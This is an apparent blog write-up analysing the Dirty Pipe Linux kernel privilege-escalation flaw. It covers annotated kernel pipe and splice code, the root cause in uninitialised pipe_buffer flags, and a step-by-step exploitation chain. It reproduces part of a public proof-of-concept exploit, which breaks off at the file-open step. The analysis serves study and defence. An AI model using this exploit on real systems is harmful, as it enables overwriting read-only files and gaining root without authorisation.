Dirty Pipe Vulnerability Analysis

不可视境界线, last modified: February 5, 2023 (afternoon)

Main reference –> kp <–

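I. Introduction

Dirty Pipe is a privilege-escalation vulnerability in the Linux kernel. Its impact is comparable to Dirty COW, but it is easier to exploit.

Affected range: from the commit "pipe: merge anon_pipe_buf*_ops" (v5.8-rc1) up to the commit "lib/iov_iter: initialize “flags” in new pipe_buffer" (v5.17-rc6).

In calendar terms that is roughly 2020/5/21 - 2022/2/21.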
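As a rough illustration of that range, here is a minimal sketch of a mainline version check. The helper name `in_dirty_pipe_mainline_range` is hypothetical, and it assumes plain mainline release numbers only: backports of the fix to stable or distribution kernels are not taken into account, so a "true" result is a hint, not proof.

```c
#include <stdbool.h>

/* Coarse check against mainline releases: true for 5.8 <= version < 5.17.
 * Assumption: stable/distro backports of the fix are NOT considered. */
static bool in_dirty_pipe_mainline_range(unsigned int major, unsigned int minor)
{
    if (major != 5)
        return false;
    return minor >= 8 && minor <= 16;
}
```

In practice the two numbers would come from something like `uname -r`, parsed by the caller.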

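II. Environment Setup

I downloaded the f6dd97 revision directly from GitHub and borrowed the pwn.college scripts. The kernel build configuration follows kp's blog.

Extra problems hit during the build:

  • The classic thunk.o issue, which I had already run into before.

  • Then something new came up and needed yet another patch. It took quite a while to track down.

  • Then dwarves had to be installed as well, because of: BTF: .tmp_vmlinux.btf: pahole (pahole) is not available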

III. A Brief Look at the Code

Pipe-related function interfaces (no source, kernel doc)

read&write

const struct file_operations pipefifo_fops = {
    .open = fifo_open,
    .llseek = no_llseek,
    .read_iter = pipe_read, // read
    .write_iter = pipe_write, // write
    .poll = pipe_poll,
    .unlocked_ioctl = pipe_ioctl,
    .release = pipe_release,
    .fasync = pipe_fasync,
};

The read and write functions are declared as follows:

static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)
static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)

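All we need to know for now:

  • iocb: holds the pointer through which the current pipe structure is obtained.
  • to/from: both are of the iov_iter iterator type. to is where data read out of the pipe will be written; from is the source of the data being written into the pipe.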

pipe_inode_info

The pipe_inode_info structure holds the fields the pipe mechanism needs:

/**
 * struct pipe_inode_info - a linux kernel pipe
 * @mutex: mutex protecting the whole thing
 * @rd_wait: reader wait point in case of empty pipe
 * @wr_wait: writer wait point in case of full pipe
 * @head: The point of buffer production
 * @tail: The point of buffer consumption
 * @max_usage: The maximum number of slots that may be used in the ring
 * @ring_size: total number of buffers (should be a power of 2)
 * @tmp_page: cached released page
 * @readers: number of current readers of this pipe
 * @writers: number of current writers of this pipe
 * @files: number of struct file referring this pipe (protected by ->i_lock)
 * @r_counter: reader counter
 * @w_counter: writer counter
 * @fasync_readers: reader side fasync
 * @fasync_writers: writer side fasync
 * @bufs: the circular array of pipe buffers
 * @user: the user who created this pipe
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
};

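A pipe stores its data in a ring queue: a fixed-size ring of buffers (the pipe buf ring) that holds as much data as it can.

  • head: index of the front of the queue; head is the next position to be written.
  • tail: index of the back of the queue; tail is the next position to be read.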
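The head/tail bookkeeping can be modeled in user space as below. This is only a sketch: the `model_*` names are mine, and it assumes (as the `ring_size - 1` masks in the kernel code quoted later suggest) that head and tail are free-running counters and that only the masked value selects a slot.

```c
#include <stdbool.h>

/* Number of occupied slots; unsigned wrap-around is intended. */
static unsigned int model_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/* The ring is empty when producer and consumer indexes coincide. */
static bool model_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}

/* The ring is full once the occupancy reaches the usage limit. */
static bool model_full(unsigned int head, unsigned int tail, unsigned int limit)
{
    return model_occupancy(head, tail) >= limit;
}

/* Map a free-running index to a slot; ring_size must be a power of two. */
static unsigned int model_slot(unsigned int index, unsigned int ring_size)
{
    return index & (ring_size - 1);
}
```

Because the indexes never reset, a slot is reused as soon as the counters wrap around the ring, which is exactly why stale per-slot state matters later in this analysis.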

pipe_buffer

This structure describes the data actually stored in the pipe:

/**
 * struct pipe_buffer - a linux kernel pipe buffer
 * @page: the page containing the data for the pipe buffer
 * @offset: offset of data inside the @page
 * @len: length of data inside the @page
 * @ops: operations associated with this buffer. See @pipe_buf_operations.
 * @flags: pipe buffer flags. See above.
 * @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

The structure holds the key information: the page reference, the offset into the page, the data length, and so on. The possible flags are:

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
#define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */

We can ignore what each of these flags means for now.

iov_iter

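The iov_iter structure is used to iterate over data that is split across multiple pages; in other words, it walks the data page by page. It is defined as follows: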

enum iter_type {
    /* iter types */
    ITER_IOVEC = 4,
    ITER_KVEC = 8,
    ITER_BVEC = 16,
    ITER_PIPE = 32, // the data being iterated lives in a pipe
    ITER_DISCARD = 64,
};

struct iov_iter {
    /*
     * Bit 0 is the read/write bit, set if we're writing.
     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
     * the caller isn't expecting to drop a page reference when done.
     */
    unsigned int type;
    size_t iov_offset;
    size_t count;
    union {
        const struct iovec *iov;
        const struct kvec *kvec;
        const struct bio_vec *bvec;
        struct pipe_inode_info *pipe;
    };
    union {
        unsigned long nr_segs;
        struct {
            unsigned int head;
            unsigned int start_head;
        };
    };
};

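Some of the fields mean the following:

  • type: what kind of structure the iterated data comes from, for example:

    • ITER_PIPE: the data being iterated is page data inside a pipe.
    • ITER_DISCARD: everything written to this iov_iter is discarded.
    • ITER_KVEC: much like ITER_IOVEC, but with the data in kernel space.
    • ITER_BVEC: works with parts of memory-mapped pages.

    Later memory reads and writes on an iov_iter dispatch on this type to pick the matching operation.

  • iov_offset: the offset inside the page currently being iterated; reads and writes start at this offset within the page.

  • count: the number of bytes that can still be read or written.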
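For intuition only, the closest user-space relative of an ITER_IOVEC iterator is the `struct iovec` array passed to `writev(2)`. The sketch below is not kernel code, and the helper name `write_two_segments` is made up for this example; it just shows one call consuming several separate buffers in order.

```c
#include <sys/uio.h>
#include <unistd.h>

/* Write two separate buffers with a single call. The kernel walks the
 * iovec array segment by segment, which is the job iov_iter does for it. */
static ssize_t write_two_segments(int fd, const char *a, size_t alen,
                                  const char *b, size_t blen)
{
    struct iovec iov[2] = {
        { .iov_base = (void *)a, .iov_len = alen },
        { .iov_base = (void *)b, .iov_len = blen },
    };

    return writev(fd, iov, 2);
}
```

Calling it on the write end of a pipe with "dirty" and "pipe" queues the nine bytes back to back, as if they had been one contiguous buffer.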

Call structure around pipe_read

flowchart TB
s["pipe_read(pipe->iter)"] --> copy_page_to_iter
copy_page_to_iter -->|iter KVEC+BVEC| copy_to_iter
copy_page_to_iter -->|ITER_PIPE| copy_page_to_iter_pipe
copy_page_to_iter -->|other type| copy_page_to_iter_iovec
copy_to_iter --> _copy_to_iter
_copy_to_iter -->|iter is pipe| copy_pipe_to_iter
_copy_to_iter -->|other| iterate_and_advance???
other_callpoint -->|with iov_iter is pipe| copy_to_iter
copy_pipe_to_iter --> push_pipe
copy_pipe_to_iter --> a["memcpy_to_page(per page)"]

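  • Rough flow: loop over the pipe->bufs array and use copy_page_to_iter to copy each buf's page into iter. If iter is itself a pipe, nothing is copied and the page is referenced directly. Repeat, take care of truncation and similar details, and the read is done.
  • copy_pipe_to_iter is a rather misleading name: it means the iter is of type pipe, and content is copied from the page that addr points to into the pipe buf.
  • Because copy_page_to_iter_pipe makes the pipe buf reference another page directly, pipe_write must make sure newly written data never lands in such a page, and that guarantee rests on the MERGE flag. There is something interesting here, though: many fields of the receiving pipe buf are reassigned, but one is left out, namely flags.
  • push_pipe checks whether the target pipe has enough room and adds pages if it does not. When the kernel loops to attach pages to pipe_buffers there, it does not initialize the pipe_buffer flags either! And since the pipe_buffer array is a ring by design, a pipe_buffer populated this way also reuses whatever flags the slot carried before.
  • A side note: seeing void *kaddr = kmap_atomic(page); led me to the concept of highmem. The actual implementation of that function is architecture-specific.

To summarize how copy_page_to_iter and copy_to_iter differ when copying data into a pipe:

  • The former hands the pipe data that sits on a complete page, so the pipe buf only has to reference that page and record offset and len to finish the "copy".
  • The latter does not assume the source sits on a complete page; it gets an addr and a len, so the pipe buf has to provide its own page to hold the data.

Code of copy_page_to_iter_pipe: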

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
                                     struct iov_iter *i)
{
    // The pipe structure to write into
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    // Some state of the target pipe, such as head and tail
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    // Sanity checks
    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;

    // Relative offset to write at
    off = i->iov_offset;
    // The pipe buf that will receive the data
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    // If the target pipe is full, return right away
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    // Bump the page's refcount
    get_page(page);
    buf->page = page; // reference the existing page directly
    buf->offset = offset;
    buf->len = bytes;
    // note: buf->flags is never assigned here

    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

pipe_write

Source

First part of pipe_write:

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

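The purpose of the function is to copy from iter into the pipe's bufs.

If the pipe already holds data, and
the total iter length is not a multiple of the page size && (pipe buf offset + length already in the pipe buf + total iter length mod page size) <= PAGE_SIZE,
then the leading chunk of iter is first appended to the existing pipe buf, merging the data.

The merge requires the pipe buf to carry PIPE_BUF_FLAG_CAN_MERGE. That flag is set automatically by pipe_write as long as the fd being written was not opened with O_DIRECT.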
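The merge test can be written out as a small predicate. This is a user-space sketch, not the kernel function: `model_would_merge` and the `MODEL_*` constants are names I made up, the page size is assumed to be 4096, and `pipe_buf_confirm` is left out.

```c
#include <stdbool.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u
#define MODEL_FLAG_CAN_MERGE 0x10u /* same value as PIPE_BUF_FLAG_CAN_MERGE */

/* True when the first part of pipe_write would append to the most recently
 * filled buffer instead of taking a fresh slot. */
static bool model_would_merge(bool pipe_was_empty, unsigned int buf_flags,
                              unsigned int buf_offset, unsigned int buf_len,
                              size_t total_len)
{
    /* total_len mod page size: the tail that does not fill a whole page */
    size_t chars = total_len & (MODEL_PAGE_SIZE - 1);

    if (chars == 0 || pipe_was_empty)
        return false;
    if (!(buf_flags & MODEL_FLAG_CAN_MERGE))
        return false;
    return buf_offset + buf_len + chars <= MODEL_PAGE_SIZE;
}
```

Note that nothing in this predicate looks at who owns the page; the flag is the only gatekeeper.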

Next comes the normal page-write logic:

for (;;) {
    // A pipe with no readers is broken, so raise SIGPIPE
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        if (!ret)
            ret = -EPIPE;
        break;
    }
    // Keep trying to write data into the pipe
    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[head & mask];
        struct page *page = pipe->tmp_page;
        int copied;
        // Pick up the tmp_page that was released earlier but kept cached.
        // If there is one, it is reused for this write and no allocation is needed
        if (!page) {
            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
            if (unlikely(!page)) {
                ret = ret ? : -ENOMEM;
                break;
            }
            pipe->tmp_page = page;
        }

        /* Allocate a slot in the ring in advance and attach an
         * empty buffer. If we fault or otherwise fail to use
         * it, either the reader will consume it or it'll still
         * be there for the next write.
         */
        spin_lock_irq(&pipe->rd_wait.lock);

        head = pipe->head;
        if (pipe_full(head, pipe->tail, pipe->max_usage)) {
            spin_unlock_irq(&pipe->rd_wait.lock);
            continue;
        }

        pipe->head = head + 1;
        spin_unlock_irq(&pipe->rd_wait.lock);

        /* Insert it into the buffer array */
        // Fill in the new pipe buf
        buf = &pipe->bufs[head & mask];
        buf->page = page;
        buf->ops = &anon_pipe_buf_ops; // anonymous pipe operations
        buf->offset = 0;
        buf->len = 0;
        // With O_DIRECT on the fd, every write takes a new page and is never merged
        if (is_packetized(filp))
            buf->flags = PIPE_BUF_FLAG_PACKET;
        else
            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
        pipe->tmp_page = NULL;
        // Copy the page data
        copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
        if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        ret += copied;
        buf->offset = 0;
        buf->len = copied;

        if (!iov_iter_count(from))
            break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
        continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
        if (!ret)
            ret = -EAGAIN;
        break;
    }
    if (signal_pending(current)) {
        if (!ret)
            ret = -ERESTARTSYS;
        break;
    }
    ...
}

A quick word on tmp_page. If the page held by a pipe buf is held by nobody else and is about to be released, the pipe quietly keeps the page instead of freeing it and caches it for later use:

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

    /*
     * If nobody else uses this page, and we don't already have a
     * temporary page, let's keep track of it as a one-deep
     * allocation cache. (Otherwise just release our reference to it)
     */
    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}
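The one-deep cache is easy to mimic in user space. The sketch below is a simplified model under my own assumptions: `struct model_page`, `struct model_pipe`, `model_release` and `model_get_page` are hypothetical names, the reference count is a plain int, and `malloc` stands in for `alloc_page`.

```c
#include <stdlib.h>

struct model_page { int refcount; };
struct model_pipe { struct model_page *tmp_page; };

/* Mirrors the decision in anon_pipe_buf_release: keep one spare page,
 * otherwise just drop our reference. */
static void model_release(struct model_pipe *pipe, struct model_page *page)
{
    if (page->refcount == 1 && pipe->tmp_page == NULL)
        pipe->tmp_page = page;      /* cache it for the next write */
    else if (--page->refcount == 0)
        free(page);                 /* last reference is gone */
}

/* Mirrors the allocation step in pipe_write: reuse the cached page if any. */
static struct model_page *model_get_page(struct model_pipe *pipe)
{
    struct model_page *page = pipe->tmp_page;

    if (page == NULL) {
        page = malloc(sizeof(*page));
        if (page == NULL)
            return NULL;
        page->refcount = 1;
    }
    pipe->tmp_page = NULL;          /* the page now belongs to a buffer */
    return page;
}
```

A release followed by a get hands back the very same page, which saves one allocation per write on a busy pipe.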

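From the pipe read and write paths we can see that the pages stored in pipe bufs come in just two kinds:

  1. Pages owned by someone else that must stay unchanged (for example page-cache pages), referenced directly so that no data has to be copied.
  2. Pages the pipe allocated itself, which require a data copy.

The pipe mechanism is responsible for making sure the page data stored in pipe bufs is not overwritten by the pipe itself. Note also that a merge may only happen on pages the pipe allocated itself.

That is because a pipe is meant to be nothing more than a message channel and should not cause unexpected modifications to memory, which is what a merge into a borrowed page would be.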

The do_splice function

The Linux splice function copies data from one fd straight into another fd without passing through user space. It is declared as follows:

#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <fcntl.h>

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

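The fds here can only be of two kinds, pipe fd or file fd, so do_splice checks the fd types and performs a different kind of transfer for each case.

Here we only care about the case where the from-fd is a file and the to-fd is a pipe, that is, data moving from a file into a pipe: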

/*
 * Determine where to splice to/from.
 */
long do_splice(struct file *in, loff_t __user *off_in,
               struct file *out, loff_t __user *off_out,
               size_t len, unsigned int flags)
{
    struct pipe_inode_info *ipipe;
    struct pipe_inode_info *opipe;
    loff_t offset;
    long ret;

    ipipe = get_pipe_info(in);
    opipe = get_pipe_info(out);
    ...;

    // Data is being copied from a file into a pipe
    if (opipe) {
        ...
        // Wait for the pipe to have free space
        if (out->f_flags & O_NONBLOCK)
            flags |= SPLICE_F_NONBLOCK;

        pipe_lock(opipe);
        ret = wait_for_space(opipe, flags);
        // Once the pipe has free space
        if (!ret) {
            unsigned int p_space;
            // Work out how much data to transfer
            /* Don't try to read more the pipe has space for. */
            p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
            len = min_t(size_t, len, p_space << PAGE_SHIFT);
            // Perform the actual transfer
            ret = do_splice_to(in, &offset, opipe, len, flags);
        }
        ...
        return ret;
    }

    ...
}

Inside do_splice_to, the kernel calls the splice_read function that matches the file's filesystem:

/*
 * Attempt to initiate a splice from a file to a pipe.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
                         struct pipe_inode_info *pipe, size_t len,
                         unsigned int flags)
{
    int ret;

    if (unlikely(!(in->f_mode & FMODE_READ)))
        return -EBADF;

    ret = rw_verify_area(READ, in, ppos, len);
    if (unlikely(ret < 0))
        return ret;

    if (unlikely(len > MAX_RW_COUNT))
        len = MAX_RW_COUNT;
    // Call the splice_read function
    if (in->f_op->splice_read)
        return in->f_op->splice_read(in, ppos, pipe, len, flags);
    return default_file_splice_read(in, ppos, pipe, len, flags);
}

Taking ext4, the most common Linux filesystem, as the example, these are some of the key methods it sets:

// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
    ...
    .read_iter = ext4_file_read_iter,
    ...
    .splice_read = generic_file_splice_read,
    ...
};

So do_splice_to ends up calling generic_file_splice_read to perform the transfer:

/**
 * generic_file_splice_read - splice data from file to a pipe
 * @in: file to splice from
 * @ppos: position in @in
 * @pipe: pipe to splice to
 * @len: number of bytes to splice
 * @flags: splice modifier flags
 *
 * Description:
 * Will read pages from given file and fill them into a pipe. Can be
 * used as long as it has more or less sane ->read_iter().
 *
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                                 struct pipe_inode_info *pipe, size_t len,
                                 unsigned int flags)
{
    struct iov_iter to;
    struct kiocb kiocb;
    unsigned int i_head;
    int ret;

    // Build an iov_iter on top of the pipe structure
    iov_iter_pipe(&to, READ, pipe, len);
    i_head = to.head;
    // Build the kiocb
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    // call_read_iter performs the actual data transfer !!!
    ret = call_read_iter(in, &kiocb, &to);
    // The transfer succeeded
    if (ret > 0) {
        // Update the file access bookkeeping
        *ppos = kiocb.ki_pos;
        file_accessed(in);
    // The transfer failed
    } else if (ret < 0) {
        to.head = i_head;
        to.iov_offset = 0;
        iov_iter_advance(&to, 0); /* to free what was emitted */
        /*
         * callers of ->splice_read() expect -EAGAIN on
         * "can't put anything in there", rather than -EFAULT.
         */
        if (ret == -EFAULT)
            ret = -EAGAIN;
    }

    return ret;
}

As the code of generic_file_splice_read shows, it ends up calling call_read_iter to move the data, and that function in turn calls the filesystem-specific read_iter:

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}

From ext4_file_operations we know that call_read_iter lands in ext4_file_read_iter:

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    // A few simple checks
    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

    if (!iov_iter_count(to))
        return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_read_iter(iocb, to);
#endif
    if (iocb->ki_flags & IOCB_DIRECT)
        return ext4_dio_read_iter(iocb, to);
    // Without O_DIRECT we end up here
    return generic_file_read_iter(iocb, to);
}

What is CONFIG_FS_DAX – Direct Access (DAX) support found in fs/Kconfig

That function then calls generic_file_read_iter:

/**
 * generic_file_read_iter - generic filesystem read routine
 * @iocb: kernel I/O control block
 * @iter: destination for the data read
 *
 * This is the "read_iter()" routine for all filesystems
 * that can use the page cache directly.
 * Return:
 * * number of bytes copied, even for partial reads
 * * negative error code if nothing was read
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    size_t count = iov_iter_count(iter);
    ssize_t retval = 0;

    if (!count)
        goto out; /* skip atime */

    if (iocb->ki_flags & IOCB_DIRECT) {
        ...
    }
    // Keep going down the call chain
    retval = generic_file_buffered_read(iocb, iter, retval);
out:
    return retval;
}

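Next comes generic_file_buffered_read. The function is too long to quote, so here is only what it roughly does:

  • Look in the file's existing page-cache mapping for a page that was cached earlier.
    • If there is no cached page, read the file data from disk and create a new one.
    • If there is a cached page but it is out of date, refresh it.
  • At this point a cached page is guaranteed to exist, so copy_page_to_iter is called to move the data on that page-cache page into the pipe.

That is exactly the function introduced earlier, so the whole splice system call can now be tied to the uninitialized-field bug on the pipe side.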

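IV. Root Cause

The vulnerability did not appear in one step; it is the combined result of two commits:

  • new iov_iter flavour: pipe-backed - linux commit 241699: introduced the uninitialized-field bug. Neither push_pipe nor copy_page_to_iter_pipe initializes the flags field when setting up a pipe_buffer.

  • pipe: merge anon_pipe_buf*_ops - linux commit f6dd97: before this commit, the kernel decided whether a pipe_buf could be merged by comparing the address stored in pipe_buf->ops. That was not elegant, because mergeable or not, the function pointers the ops tables contain are exactly the same: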

    // fs/pipe.c
    static const struct pipe_buf_operations anon_pipe_buf_ops = {
        .confirm = generic_pipe_buf_confirm,
        .release = anon_pipe_buf_release,
        .steal = anon_pipe_buf_steal,
        .get = generic_pipe_buf_get,
    };

    static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
        .confirm = generic_pipe_buf_confirm,
        .release = anon_pipe_buf_release,
        .steal = anon_pipe_buf_steal,
        .get = generic_pipe_buf_get,
    };

    static const struct pipe_buf_operations packet_pipe_buf_ops = {
        .confirm = generic_pipe_buf_confirm,
        .release = anon_pipe_buf_release,
        .steal = anon_pipe_buf_steal,
        .get = generic_pipe_buf_get,
    };

    Code this tricky is clearly inelegant, so in this commit (f6dd97) Linux refactored it and introduced a new pipe buf flag: PIPE_BUF_FLAG_CAN_MERGE

    // include/linux/pipe_fs_i.h
    #define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
    #define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
    #define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
    #define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
    #define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */ // <= the newly introduced flag

    The refactoring itself is fine; its only side effect is the new pipe buf flag PIPE_BUF_FLAG_CAN_MERGE.

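The first commit introduced the uninitialized field, but on its own the bug could not do much damage, because none of the pipe buf flags available at the time was exploitable. Once the second commit added PIPE_BUF_FLAG_CAN_MERGE, however, a new pipe_buf could inherit a stale flag such as PIPE_BUF_FLAG_CAN_MERGE through the uninitialized field. This breaks the integrity of pipe bufs and allows writes to pages that should never be written (pages that should not carry PIPE_BUF_FLAG_CAN_MERGE, such as page-cache pages).

Note that these read-only pages are not protected inside the pipe by permission checks or similar mechanisms; only the logic implemented by the pipe keeps them from being written. So once that logic goes wrong, the pipe can write to read-only pages and thereby achieve an arbitrary file write.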
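The interplay of the two commits can be reproduced with a toy model in user space. Everything below is a sketch under my own assumptions: the `m_*` names, the 4-slot ring and the byte arrays standing in for pages are all made up, and locking, refcounts and ops tables are ignored. The `reset_flags` switch models the difference between leaving flags untouched and initializing them when a slot is reused.

```c
#include <string.h>

#define M_PAGE_SIZE 4096u
#define M_RING 4u
#define M_CAN_MERGE 0x10u

struct m_buf {
    unsigned char *page;        /* owned or merely referenced page */
    unsigned int offset, len;
    unsigned int flags;
};

struct m_pipe {
    struct m_buf bufs[M_RING];
    unsigned int head, tail;
};

/* Normal write path: take a new slot backed by the pipe's own page. */
static void m_write_new(struct m_pipe *p, unsigned char *own_page,
                        const void *data, unsigned int n)
{
    struct m_buf *b = &p->bufs[p->head++ & (M_RING - 1)];

    memcpy(own_page, data, n);
    b->page = own_page;
    b->offset = 0;
    b->len = n;
    b->flags = M_CAN_MERGE;
}

/* Read path: the slot is released, but its flags stay behind. */
static void m_read_one(struct m_pipe *p)
{
    p->tail++;
}

/* Splice path: reference a foreign page. With reset_flags == 0 the stale
 * flags of the reused slot survive, as in the vulnerable kernels. */
static void m_splice_ref(struct m_pipe *p, unsigned char *cache_page,
                         unsigned int offset, unsigned int n, int reset_flags)
{
    struct m_buf *b = &p->bufs[p->head++ & (M_RING - 1)];

    b->page = cache_page;
    b->offset = offset;
    b->len = n;
    if (reset_flags)
        b->flags = 0;
}

/* Merge path of write: append to the last slot if its flags allow it.
 * Returns 1 when the data went into the existing page, 0 otherwise. */
static int m_write_merge(struct m_pipe *p, const void *data, unsigned int n)
{
    struct m_buf *b = &p->bufs[(p->head - 1) & (M_RING - 1)];
    unsigned int off = b->offset + b->len;

    if (p->head == p->tail || !(b->flags & M_CAN_MERGE) || off + n > M_PAGE_SIZE)
        return 0;
    memcpy(b->page + off, data, n);
    b->len += n;
    return 1;
}
```

Filling and draining the ring, then calling `m_splice_ref` with `reset_flags` set to 0, lets `m_write_merge` scribble into the "page cache" array; with `reset_flags` set to 1 the merge is refused.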

V. Exploitation

tryhackme

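From the code analysis above we can work out the following exploitation chain:

  1. Create a pipe (make sure not to pass O_DIRECT).

  2. Write a large amount of data into the pipe, so that every pipe buf in the pipe structure ends up with PIPE_BUF_FLAG_CAN_MERGE set in its flags.

  3. Read all of the data back out of the pipe, releasing every pipe buf.

  4. Call splice to move data from a readable file into the pipe, with a length that is not aligned to the page size. The pipe buf at the head of the pipe is then bound to have its page pointing at the file's page cache and its flags equal to PIPE_BUF_FLAG_CAN_MERGE.

    Because a pipe buf's flags are not initialized when the slot is reused, they still hold PIPE_BUF_FLAG_CAN_MERGE.

  5. Keep writing the target data into the pipe. Since PIPE_BUF_FLAG_CAN_MERGE is still set, the newly written data is merged directly into the page-cache page that the pipe buf points to.

  6. Any later access to the file is served from the modified page cache, which gives us an arbitrary file write at the kernel level.

Note that modifying the page cache "by accident" through this bug does not cause the page to be written back to disk. The modified page is saved to disk only if some other part of the kernel legitimately writes to that page-cache page and thereby marks it dirty.

The kernel does not decide whether a page-cache page is dirty by checking whether its data changed; it checks the page's dirty flag. Rewriting the page cache through Dirty Pipe does not touch that flag.

Since cm4all has already published a very clear and readable POC, it is reproduced here as is: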

#define _GNU_SOURCE /* for splice() and F_GETPIPE_SZ */
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }

    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
